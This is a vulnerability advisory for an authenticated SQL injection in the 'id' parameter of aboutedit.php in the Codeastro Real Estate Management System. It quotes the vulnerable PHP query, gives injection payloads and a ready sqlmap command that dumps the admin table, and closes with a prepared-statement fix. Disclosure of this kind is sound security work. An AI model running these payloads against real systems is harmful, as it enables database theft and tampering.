- Application Name: Codeastro Real Estate Management System
- Software Link: Download Link
- Vendor Homepage: Vendor Homepage
- BuG: Authenticated SQL Injection
- BUG_Author: egsec
- In particular, this Real Estate Management System Project in PHP focuses mainly on publishing and viewing properties. To be more precise, the system helps to keep a number of sales and rental properties.
- An SQL injection vulnerability exists in the
idparameter of theaboutedit.phppage within the admin panel of the application. This vulnerability allows an attacker to manipulate the SQL query executed by the server by injecting malicious SQL code through the id parameter.
aboutedit.php:
...
$aid = $_GET['id'];
..
$sql = "UPDATE about SET title = '{$title}' , content = '{$content}', image ='{$aimage}' WHERE id = {$aid}";
...- In the code above, the
idparameter from the$_GETsuperglobal is directly included in the SQL query without any sanitization or parameterization. This allows an attacker to inject malicious SQL code into the id parameter, potentially manipulating the query and compromising the database.
- put the single quote to the
idparameter =>http://localhost/RealEstate-PHP/admin/aboutedit.php?id=10':
it means that single quote ' is executed as command by application
- use this payload (
aboutedit.php?id=11 OR 1=1) and notice that it will dump all "About Pages":
execution in the code:
UPDATE about SET title = '...', content = '...', image = '...' WHERE id = 10 OR 1=1;- after detecting sql injection vulnerability, the exploitation step can be implemented by the
sqlmap:
python3.12 sqlmap.py -u "http://localhost/RealEstate-PHP/admin/aboutedit.php?id=10*" --dbms MySQL -D realestatephp -T admin --dumpit will dump admin data in the database:
- PoC video: link
- This SQL injection vulnerability allows attackers to manipulate database queries through the id parameter. Exploiting this flaw can lead to unauthorized data modification, data leakage, privilege escalation, and, in severe cases, complete database compromise. This could result in data loss, exposure of sensitive information, and compliance violations, ultimately damaging the organization’s reputation and leading to potential legal repercussions. Immediate remediation is crucial to protect the integrity and security of the application and its data.
- Prepared Statements: The query now uses prepare() and bind_param() methods, which ensure that input values are safely bound to the query without risking SQL injection.
- Data Type Binding: bind_param() specifies the data types of the parameters (e.g., "sssi" for string, string, string, integer), adding an extra layer of security by validating input types.
- Validation and Escaping: Prepared statements handle escaping of special characters automatically, reducing the risk of injection.